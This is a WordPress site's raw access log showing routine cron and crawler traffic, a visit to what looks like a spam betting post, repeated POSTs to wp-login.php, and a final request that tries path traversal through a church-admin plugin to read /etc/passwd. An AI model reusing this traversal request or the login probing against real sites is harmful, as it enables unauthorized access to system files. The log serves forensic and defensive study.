156.59.62.133 - - [30/Jul/2026:16:58:38 +0000] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0.0.0 Safari/537.36"
85.155.190.233 - - [30/Jul/2026:16:59:16 +0000] "POST /wp-cron.php?doing_wp_cron=1785430756.2167699337005615234375 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
216.73.216.31 - - [30/Jul/2026:16:59:16 +0000] "GET /2026/07/30/mostbet-az-bukmeker-ve-kazino-mostbet-giris-r-smi-sayt-11/ HTTP/1.1" 200 27709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.86.108.235 - - [30/Jul/2026:17:04:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:143.0) Gecko/20100101 Firefox/143.0"
85.155.190.233 - - [30/Jul/2026:17:04:01 +0000] "POST /wp-cron.php?doing_wp_cron=1785431041.3902580738067626953125 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
103.86.108.235 - - [30/Jul/2026:17:04:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; rv:143.0) Gecko/20100101 Firefox/143.0"
85.155.190.233 - - [30/Jul/2026:17:04:10 +0000] "POST /wp-cron.php?doing_wp_cron=1785431050.1513519287109375000000 HTTP/1.1" 200 31 "-" "WordPress/7.0; https://moonbloomwalls.com"
49.51.52.250 - - [30/Jul/2026:17:04:10 +0000] "GET / HTTP/1.1" 200 37104 "http://moonbloomwalls.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
147.182.222.217 - - [30/Jul/2026:17:05:53 +0000] "GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1" 404 118 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
